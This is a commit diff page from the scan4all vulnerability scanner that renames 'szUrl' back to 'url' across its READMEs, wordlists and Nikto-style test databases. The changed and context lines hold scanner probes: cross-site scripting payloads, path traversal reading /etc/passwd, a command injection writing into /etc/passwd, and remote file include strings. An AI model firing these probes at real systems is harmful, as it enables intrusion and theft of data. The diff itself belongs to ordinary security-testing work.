crash.software
Projects
Pull Requests
Issues
Builds
scan4all
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY scan4all Commits 396a5274
🤬
  • ■ ■ ■ ■
    .gitmodules
    1 1  [submodule "nuclei-templates"]
    2 2   path = nuclei-templates
    3  - szUrl = [email protected]:hktalent/nuclei-templates.git
     3 + url = [email protected]:hktalent/nuclei-templates.git
    4 4   
  • ■ ■ ■ ■ ■ ■
    README.md
    1  -[![Tweet](https://img.shields.io/twitter/szUrl/http/Hktalent3135773.svg?style=social)](https://twitter.com/intent/follow?screen_name=Hktalent3135773) [![Follow on Twitter](https://img.shields.io/twitter/follow/Hktalent3135773.svg?style=social&label=Follow)](https://twitter.com/intent/follow?screen_name=Hktalent3135773) [![GitHub Followers](https://img.shields.io/github/followers/hktalent.svg?style=social&label=Follow)](https://github.com/hktalent/)
     1 +[![Tweet](https://img.shields.io/twitter/url/http/Hktalent3135773.svg?style=social)](https://twitter.com/intent/follow?screen_name=Hktalent3135773) [![Follow on Twitter](https://img.shields.io/twitter/follow/Hktalent3135773.svg?style=social&label=Follow)](https://twitter.com/intent/follow?screen_name=Hktalent3135773) [![GitHub Followers](https://img.shields.io/github/followers/hktalent.svg?style=social&label=Follow)](https://github.com/hktalent/)
    2 2  <p align="center">
    3 3   <a href="/README_CN.md">README_中文</a> •
    4 4   <a href="/static/Installation.md">Compile/Install/Run</a> •
    skipped 144 lines
    149 149   <a href=https://github.com/hktalent/scan4all/discussions>Using Help</a>
    150 150  ```bash
    151 151  go build
    152  -# Precise scan szUrl list UrlPrecise=true
     152 +# Precise scan url list UrlPrecise=true
    153 153  UrlPrecise=true ./scan4all -l xx.txt
    154 154  # Disable adaptation to nmap and use naabu port to scan its internally defined http-related ports
    155 155  priorityNmap=false ./scan4all -tp http -list allOut.txt -v
    skipped 49 lines
  • ■ ■ ■ ■
    README_CN.md
    1  -[![Tweet](https://img.shields.io/twitter/szUrl/http/Hktalent3135773.svg?style=social)](https://twitter.com/intent/follow?screen_name=Hktalent3135773) [![Follow on Twitter](https://img.shields.io/twitter/follow/Hktalent3135773.svg?style=social&label=Follow)](https://twitter.com/intent/follow?screen_name=Hktalent3135773) [![GitHub Followers](https://img.shields.io/github/followers/hktalent.svg?style=social&label=Follow)](https://github.com/hktalent/)
     1 +[![Tweet](https://img.shields.io/twitter/url/http/Hktalent3135773.svg?style=social)](https://twitter.com/intent/follow?screen_name=Hktalent3135773) [![Follow on Twitter](https://img.shields.io/twitter/follow/Hktalent3135773.svg?style=social&label=Follow)](https://twitter.com/intent/follow?screen_name=Hktalent3135773) [![GitHub Followers](https://img.shields.io/github/followers/hktalent.svg?style=social&label=Follow)](https://github.com/hktalent/)
    2 2  <p align="center">
    3 3   <a href="/README.md">README_EN</a> •
    4 4   <a href="/static/Installation.md">编译/安装/运行</a> •
    skipped 240 lines
  • ■ ■ ■ ■ ■ ■
    brute/dicts/filedic.txt
    skipped 1695 lines
    1696 1696  /api/payment?id=
    1697 1697  /api/prod/services
    1698 1698  /api/proxy
    1699  -/api/proxy?szUrl=
     1699 +/api/proxy?url=
    1700 1700  /api/saved_objects/_find?type=index-pattern&per_page=100
    1701 1701  /api/search
    1702 1702  /api/sessions
    skipped 5814 lines
    7517 7517  go.%EXT%
    7518 7518  google
    7519 7519  google-services.json
    7520  -gotoURL.asp?szUrl=google.com&id=43569
     7520 +gotoURL.asp?url=google.com&id=43569
    7521 7521  grabbed.html
    7522 7522  gradle-app.setting
    7523 7523  gradle/
    skipped 2120 lines
    9644 9644  plugins/editors/fckeditor
    9645 9645  plugins/fckeditor
    9646 9646  plugins/servlet/gadgets/makeRequest
    9647  -plugins/servlet/gadgets/makeRequest?szUrl=https://google.com
     9647 +plugins/servlet/gadgets/makeRequest?url=https://google.com
    9648 9648  plugins/servlet/oauth/users/icon
    9649 9649  plugins/sfSWFUploadPlugin/web/sfSWFUploadPlugin/swf/swfupload.swf
    9650 9650  plugins/sfSWFUploadPlugin/web/sfSWFUploadPlugin/swf/swfupload_f9.swf
    skipped 1484 lines
    11135 11135  ur-admin.php
    11136 11136  ur-admin/
    11137 11137  uri
    11138  -szUrl
    11139  -szUrl.jsp
     11138 +url
     11139 +url.jsp
    11140 11140  us
    11141 11141  usage
    11142 11142  usage/
    skipped 423 lines
    11566 11566  wp-content/plugins/disqus-comment-system/disqus.php
    11567 11567  wp-content/plugins/google-sitemap-generator/sitemap-core.php
    11568 11568  wp-content/plugins/hello.php
    11569  -wp-content/plugins/jrss-widget/proxy.php?szUrl=
     11569 +wp-content/plugins/jrss-widget/proxy.php?url=
    11570 11570  wp-content/plugins/super-forms/
    11571 11571  wp-content/plugins/wp-publication-archive/includes/openfile.php?file=
    11572 11572  wp-content/plugins/wpengine-snapshot/snapshots/
    skipped 267 lines
  • ■ ■ ■ ■
    config/databases/db_dictionary
    skipped 1682 lines
    1683 1683  upload
    1684 1684  uploader
    1685 1685  uploads
    1686  -szUrl
     1686 +url
    1687 1687  urls
    1688 1688  us
    1689 1689  usa
    skipped 152 lines
  • ■ ■ ■ ■ ■ ■
    config/databases/db_server_msgs
    skipped 117 lines
    118 118  "800098","jakarta-tomcat-4.0.1","0","Server will reveal path"
    119 119  "800099","JavaWebServer","0","Probably Sun Microsystem's servlet interface. May have default code which is exploitable. Try admin/admin for id/password."
    120 120  "800100","JetAdmin","0","HP Printer"
    121  -"800101","Jeus WebContainer\/([0-3]\.[0-2]\..*)","0","JEUS below 3.2.2 is vulnerable to XSS if a nonexistent szUrl is requested, i.e. [victim site]/[javascript].jsp"
     121 +"800101","Jeus WebContainer\/([0-3]\.[0-2]\..*)","0","JEUS below 3.2.2 is vulnerable to XSS if a nonexistent url is requested, i.e. [victim site]/[javascript].jsp"
    122 122  "800102","Jigsaw\/([0-1].*|2\.([0-1].*|2\.0))","0","Jigsaw 2.1.0 or below may be vulnerable to XSS if a nonexistent host name is requested, i.e. nosuchhost.domain.com/<script>..."
    123 123  "800103","Jigsaw\/2\.2\.1","0","Jigsaw 2.1.1 on Windows may be tricked into revealing the system path by requesting /aux two times."
    124 124  "800104","JRun\/([0-3]\..*|4\.0)","0","JRun 4.0 and below on IIS is vulnerable to remote buffer overflow with a filename over 4096. http://www.macromedia.com/v1/handlers/index.cfm?ID=23500 and http://www.eeye.com/html/Research/Advisories/index.html"
    skipped 1 lines
    126 126  "800106","KazaaClient","0","Kazaa may allow sensitive information to be retrieved, http://www.securiteam.com/securitynews/5UP0L2K55W.html"
    127 127  "800107","LabVIEW\/(5\.[1-9]|6\.[0-1])","0","LabVIEW 5.1.1 to 6.1 is vulnerable to a remote DoS by sending a malformed GET request. This DoS was not attempted."
    128 128  "800108","Lasso\/3\.6\.5","0","This version of Blueworld WebData engine is vulnerable to DoS by sending a 1600 character long GET request."
    129  -"800109","LilHTTP\/2\.1","0","LilHTTP server 2.1 allows password protected resources to be retrieved by prepending '/./' to the szUrl."
     129 +"800109","LilHTTP\/2\.1","0","LilHTTP server 2.1 allows password protected resources to be retrieved by prepending '/./' to the url."
    130 130  "800110","LocalWeb2000\/([0-1]\.*|2\.(0\.*|1\.0))","0","LocalWeb2000 2.1.0 and below allow protected files to be retrieved by prepending the request with /./"
    131 131  "800111","Lotus-Domino\/([0-3].*|4\.([0-1].*|2\.([0-1].*|3)))","0","This version of Lotus-Domino server has had multiple vulnerabilities. See the bugtraq archives for details."
    132 132  "800112","Lotus-Domino\/4\.[5-6]","0","This version of Lotus-Domino server is vulnerable to a DoS via the WEb Retriever. CAN-2003-0123."
    skipped 24 lines
    157 157  "800137","myCIO","0","The McAfee myCIO server provides antivirus updates to clients. This server has had multiple vulnerabilities in the past."
    158 158  "800138","Mylo/0\.([0-1]|2\.[0-1])","0","mod_mylo may be vulnerable to a remote buffer overflow. Upgrade to the latest version. BID-8287."
    159 159  "800139","MyServer 0\.([0-3]\..*|4\.[0-2])","0","MyServer versions lower than 0.5 contain multiple remote vulnerabilities."
    160  -"800140","MyWebServer\/(0\.*|1\.0[0-2])","0","MyWebServer versions 1.02 and below are vulnerable to a DoS by requesting a szUrl of approximately 1000 characters."
     160 +"800140","MyWebServer\/(0\.*|1\.0[0-2])","0","MyWebServer versions 1.02 and below are vulnerable to a DoS by requesting a url of approximately 1000 characters."
    161 161  "800141","ncsa","0","lower than v1.3 have multiple issues"
    162 162  "800142","neowebscript","0","Apache plugin to allow TCL use"
    163 163  "800143","netcloak","0","http://www.maxum.com plugin for webstar"
    skipped 120 lines
  • ■ ■ ■ ■ ■ ■
    config/databases/db_tests
    skipped 829 lines
    830 830  "000816","32774","4","/phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Contains PHP configuration information and is vulnerable to Cross Site Scripting (XSS).","",""
    831 831  "000817","32774","4","/phpinfo.php3?VARIABLE=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Contains PHP configuration information and is vulnerable to Cross Site Scripting (XSS).","",""
    832 832  "000818","27071","4","/phpimageview.php?pic=javascript:alert(8754)","GET","200","alert\(8754\)","","The\sdocument\shas\smoved","","PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
    833  -"000819","0","4","/phpclassifieds/latestwap.php?szUrl=<script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","PHP Classifieds 6.05 from http://www.deltascripts.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
     833 +"000819","0","4","/phpclassifieds/latestwap.php?url=<script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","PHP Classifieds 6.05 from http://www.deltascripts.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
    834 834  "000820","2193","4","/phpBB/viewtopic.php?topic_id=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","phpBB is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02.","",""
    835 835  "000821","4297","4","/phpBB/viewtopic.php?t=17071&highlight=\">\"<script>javascript:alert(document.cookie)</script>","GET","<script>javascript:alert\(document\.cookie\)<\/script>","","","","","phpBB is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
    836 836  "000822","11145","4","/phorum/admin/header.php?GLOBALS[message]=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
    skipped 93 lines
    930 930  "000917","0","4","/admin/login.php?path=\"></form><form name=a><input name=i value=XSS>&lt;script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","mcNews 1.1a from phpforums.net is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
    931 931  "000918","2243","4","/addressbook/index.php?surname=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Phpgroupware 0.9.14.003 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
    932 932  "000919","2243","4","/addressbook/index.php?name=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Phpgroupware 0.9.14.003 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
    933  -"000920","0","4","/add.php3?szUrl=ja&adurl=javascript:<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","",""," 1.1 http://www.sugarfreenet.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
     933 +"000920","0","4","/add.php3?url=ja&adurl=javascript:<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","",""," 1.1 http://www.sugarfreenet.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
    934 934  "000921","0","4","/a?<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Server is vulnerable to Cross Site Scripting (XSS) in the error message if code is passed in the query-string. This may be a Null HTTPd server.","",""
    935 935  "000922","54589","4","/a.jsp/<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","JServ is vulnerable to Cross Site Scripting (XSS) when a non-existent JSP file is requested. Upgrade to the latest version of JServ. CA-2000-02.","",""
    936 936  "000923","38019","4","/?mod=<script>alert(document.cookie)</script>&op=browse","GET","<script>alert\(document\.cookie\)","","","","","Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
    skipped 538 lines
    1475 1475  "001475","2721","7","../../../../../../../../../../etc/*","GET","passwd","","","","","Charles Steinkuehler's LEAF sh-httpd allows remote users to read any file or directory on the system. XF-13519, BID-8897","",""
    1476 1476  "001476","2721","7","../../../../../../../../../../etc/passw*","GET","root:","","","","","Charles Steinkuehler's LEAF sh-httpd allows remote users to read any file or directory on the system. XF-13519, BID-8897","",""
    1477 1477  "001477","2722","7","/bytehoard/index.php?infolder=../../../../../../../../../../../etc/","GET","passwd","","","","","ByteHoard 0.7 is vulnerable to a directory traversal attack. Upgrade to version 0.71 or higher.","",""
    1478  -"001478","2723","3","/Search","GET","[Ii]ndex [Oo]f ","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) ","","","","FirstClass 7.1 server allows file listing of any directory by accessing the /Search szUrl.","",""
     1478 +"001478","2723","3","/Search","GET","[Ii]ndex [Oo]f ","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) ","","","","FirstClass 7.1 server allows file listing of any directory by accessing the /Search url.","",""
    1479 1479  "001479","2735","d","/musicqueue.cgi","GET","200","","","","","Musicqueue 1.20 is vulnerable to a buffer overflow. Ensure the latest version is installed (exploit not attempted). http://musicqueue.sourceforge.net/","",""
    1480 1480  "001480","2735","d","@CGIDIRSmusicqueue.cgi","GET","200","","","","","Musicqueue 1.20 is vulnerable to a buffer overflow. Ensure the latest version is installed (exploit not attempted). http://musicqueue.sourceforge.net/","",""
    1481 1481  "001481","275","3","/scripts/tools/newdsn.exe","GET","200","","","","","This can be used to make DSNs, useful in use with an ODBC exploit and the RDS exploit (with msadcs.dll). Also may allow files to be created on the server. BID-1818. CVE-1999-0191. RFP9901 (http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm)","",""
    skipped 978 lines
    2460 2460  "002621","3093","1","/tutos/file/file_select.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","",""
    2461 2461  "002622","3093","1","@TYPO3typo3/dev/translations.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","",""
    2462 2462  "002623","3093","1","/uifc/MultFileUploadHandler.php+","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","",""
    2463  -"002624","3093","1","/szUrl.jsp","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","",""
     2463 +"002624","3093","1","/url.jsp","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","",""
    2464 2464  "002625","3093","1","/useraction.php3","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","",""
    2465 2465  "002626","3093","1","/userreg.cgi?cmd=insert&amp;lang=eng&amp;tnum=3&amp;fld1=test999%0acat&lt;/var/spool/mail/login&gt;&gt;/etc/passwd","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","",""
    2466 2466  "002627","3093","1","/utils/sprc.asp+","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","",""
    skipped 536 lines
    3003 3003  "003221","5092","3","/config.inc","GET","200","","","","","DotBr 0.1 configuration file includes usernames and passwords.","",""
    3004 3004  "003222","5093","3","@CGIDIRSenviron.pl","GET","REMOTE_ADDR","","","","","Sambar Server default script reveals environment information","",""
    3005 3005  "003223","5094","3","@CGIDIRStestcgi.exe","GET","REMOTE_ADDR","","","","","Sambar Server default script reveals environment information","",""
    3006  -"003224","5095","3","/sysuser/docmgr/ieedit.stm?szUrl=../","GET","200","","","","","Sambar default file may allow directory listings.","",""
     3006 +"003224","5095","3","/sysuser/docmgr/ieedit.stm?url=../","GET","200","","","","","Sambar default file may allow directory listings.","",""
    3007 3007  "003225","5096","3","/sysuser/docmgr/iecreate.stm?template=../","GET","200","","","","","Sambar default file may allow directory listings.","",""
    3008 3008  "003226","5097","4","/wwwping/index.stm?wwwsite=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
    3009 3009  "003227","5098","4","/sysuser/docmgr/create.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
    skipped 155 lines
    3165 3165  "003384","96","7","/iissamples/exair/search/search.idq?CiTemplate=../../../../../../../../../../winnt/win.ini","GET","\[fonts\]","","","","","This allows arbitrary files to be retrieved from the server. It may allow a DoS against the server. CVE-1999-0449. BID-193. MS01-033.","",""
    3166 3166  "003385","9624","3","/pass_done.php","GET","200","","","","","PY-Membres 4.2 may allow users to execute a query which generates a list of usernames and passwords.","",""
    3167 3167  "003386","9624","a","/admin/admin.php?adminpy=1","GET","200","","","","","PY-Membres 4.2 may allow administrator access.","",""
    3168  -"003387","0","1","/iishelp/iis/htm/tutorial/redirect.asp","GET","A URL is required","","","","","Possibly unchecked redirect with szUrl= variable.","",""
     3168 +"003387","0","1","/iishelp/iis/htm/tutorial/redirect.asp","GET","A URL is required","","","","","Possibly unchecked redirect with url= variable.","",""
    3169 3169  "003388","9695","3","/servlet/SnoopServlet","GET","Client Information","","","","","JRun, Netware Java Servlet Gateway, or WebSphere default servlet found. All default code should be removed from servers.","",""
    3170 3170  "003389","3268","2","/Citrix/PNAgent/","GET","[Ii]ndex [Oo]f ","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) ","","","","Directory indexing found.","",""
    3171 3171  "003390","3268","2","/Citrix/ICAWEB/","GET","[Ii]ndex [Oo]f ","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) ","","","","Directory indexing found.","",""
    skipped 1209 lines
    4381 4381  "004603","5292","c","/cron.php?include_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    4382 4382  "004604","5292","c","/crontab/run_billing.php?config[include_dir]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    4383 4383  "004605","5292","c","/crontab/run_billing.php?config[include_dir]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    4384  -"004606","5292","c","/cross.php?szUrl=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    4385  -"004607","5292","c","/cross.php?szUrl=@RFIURL ","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
     4384 +"004606","5292","c","/cross.php?url=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
     4385 +"004607","5292","c","/cross.php?url=@RFIURL ","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    4386 4386  "004608","5292","c","/custom_vars.php?sys[path_addon]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    4387 4387  "004609","5292","c","/customer/product.php?xcart_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    4388 4388  "004610","5292","c","/cwb/comanda.php?INCLUDE_PATH=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    skipped 229 lines
    4618 4618  "004843","5292","c","/i_head.php?home=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    4619 4619  "004844","5292","c","/i_nav.php?home=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    4620 4620  "004845","5292","c","/iframe.php?file=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    4621  -"004846","5292","c","/image.php?szUrl=@RFIURL???","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
     4621 +"004846","5292","c","/image.php?url=@RFIURL???","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    4622 4622  "004847","5292","c","/impex/ImpExData.php?systempath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    4623 4623  "004848","5292","c","/import.php?bibtexrootrel=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    4624 4624  "004849","5292","c","/importinfo.php?bibtexrootrel=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    skipped 305 lines
    4930 4930  "005155","5292","c","/index.php?this_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    4931 4931  "005156","5292","c","/index.php?txt=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    4932 4932  "005157","5292","c","/index.php?up=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    4933  -"005158","5292","c","/index.php?szUrl=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
     4933 +"005158","5292","c","/index.php?url=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    4934 4934  "005159","5292","c","/index.php?w=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    4935 4935  "005160","5292","c","/index.php?way=@RFIURL??????????????","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    4936 4936  "005161","5292","c","/index1.php?=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    skipped 538 lines
    5475 5475  "005700","5292","c","/rechnung.php?_PHPLIB[libdir]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    5476 5476  "005701","5292","c","/reconfig.php?GLOBALS[CLPath]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    5477 5477  "005702","5292","c","/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    5478  -"005703","5292","c","/redirect.php?szUrl=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
     5478 +"005703","5292","c","/redirect.php?url=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    5479 5479  "005704","5292","c","/redsys/404.php?REDSYS[MYPATH][TEMPLATES]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    5480 5480  "005705","5292","c","/register.php?base_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    5481 5481  "005706","5292","c","/releasenote.php?mosConfig_absolute_path=@RFIURL ","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    skipped 135 lines
    5617 5617  "005842","5292","c","/sources/Admin/admin_templates.php?CONFIG[main_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    5618 5618  "005843","5292","c","/sources/functions.php?CONFIG[main_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    5619 5619  "005844","5292","c","/sources/help.php?CONFIG[main_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    5620  -"005845","5292","c","/sources/join.php?FORM[szUrl]=owned&CONFIG[captcha]=1&CONFIG[path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    5621  -"005846","5292","c","/sources/join.php?FORM[szUrl]=owned&CONFIG[captcha]=1&CONFIG[path]=@RFIURL?cmd=ls","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
     5620 +"005845","5292","c","/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
     5621 +"005846","5292","c","/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=@RFIURL?cmd=ls","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    5622 5622  "005847","5292","c","/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    5623 5623  "005848","5292","c","/sources/mail.php?CONFIG[main_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    5624 5624  "005849","5292","c","/sources/misc/new_day.php?path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    skipped 856 lines
    6481 6481  "006778","0","2be","/sitecore/debug/Profile.xslt","GET","Data\sCache","cachemiss","","","","Sitecore CMS admin/restricted pages available","",""
    6482 6482  "006779","0","2be","/sitecore/login/default.aspx","GET","LoginPanelOuter","","","","","Sitecore CMS admin login","",""
    6483 6483  "006780","0","2be","/sitecore/shell/WebService/Service.asmx","GET","operations\sare\ssupported","","","","","Sitecore CMS webservice found","",""
    6484  -"006781","0","2be","/?sc_mode=edit","GET","302","","sitecore","","","Sitecore CMS is installed. This szUrl redirects to the login page.","",""
     6484 +"006781","0","2be","/?sc_mode=edit","GET","302","","sitecore","","","Sitecore CMS is installed. This url redirects to the login page.","",""
    6485 6485  "006782","0","2be","/sitecore/admin/stats.aspx","GET","Renderings","","","","","Sitecore CMS admin/restricted pages available","",""
    6486 6486  "006783","0","2be","/wcadmin/login.aspx","GET","QS\/1","","","","","QS/1 Webconnect administration panel","",""
    6487  -"006784","74115","4","/sitecore/login?xmlcontrol=Application&szUrl=http://www.example.com&ch=WindowChrome&ic=Applications%2f32x32%2fabout.png&he=About+Sitecore&ma=0&mi=0&re=","GET","src=\"http:\/\/www\.example\.com","","","","","Sitecore CMS contains an arbitrary redirect vulnerability.","",""
     6487 +"006784","74115","4","/sitecore/login?xmlcontrol=Application&url=http://www.example.com&ch=WindowChrome&ic=Applications%2f32x32%2fabout.png&he=About+Sitecore&ma=0&mi=0&re=","GET","src=\"http:\/\/www\.example\.com","","","","","Sitecore CMS contains an arbitrary redirect vulnerability.","",""
    6488 6488  "006785","102660","4","/?xmlcontrol=body%20onload=alert(123)","GET","<body\sONLOAD=ALERT\s123","","","","","Sitecore CMS vulnerable to Cross-Site Scripting","",""
    6489 6489  "006786","0","be","/crystal/enterprise10/admin/en/admin.cwr","GET","Crystal\sManagement\sConsole","","","","","Crystal Enterprise Management Console found","",""
    6490 6490  "006787","0","1","/encrypt.aspx","GET","200","","","","","This might be interesting.","",""
    skipped 504 lines
  • ■ ■ ■ ■ ■ ■
    config/wordlists/headers
    skipped 61 lines
    62 62  bae-logid
    63 63  bar
    64 64  base
    65  -base-szUrl
     65 +base-url
    66 66  basic
    67 67  bearer-indication
    68 68  body-maxlength
    skipped 129 lines
    198 198  dkim-signature
    199 199  dnt
    200 200  download-attachment
    201  -download-bad-szUrl
     201 +download-bad-url
    202 202  download-bz2
    203 203  download-cut-short
    204 204  download-e-headers-sent
    skipped 15 lines
    220 220  download-status-unknown
    221 221  download-tar
    222 222  download-tgz
    223  -download-szUrl
     223 +download-url
    224 224  download-zip
    225 225  e-encoding
    226 226  e-header
    skipped 7 lines
    234 234  e-response
    235 235  e-runtime
    236 236  e-socket
    237  -e-szUrl
     237 +e-url
    238 238  enable-gzip
    239 239  enable-no-cache-headers
    240 240  encoding-stream-flush-full
    skipped 80 lines
    321 321  http-host
    322 322  http-phone-number
    323 323  http-referer
    324  -http-szUrl
     324 +http-url
    325 325  http-user-agent
    326 326  http_sm_authdirname
    327 327  http_sm_authdirnamespace
    skipped 207 lines
    535 535  proxy-socks4a
    536 536  proxy-socks5
    537 537  proxy-socks5-hostname
    538  -proxy-szUrl
     538 +proxy-url
    539 539  proxy-user
    540 540  public-key-pins
    541 541  public-key-pins-report-only
    skipped 59 lines
    601 601  request-error-proxy
    602 602  request-error-redirects
    603 603  request-error-response
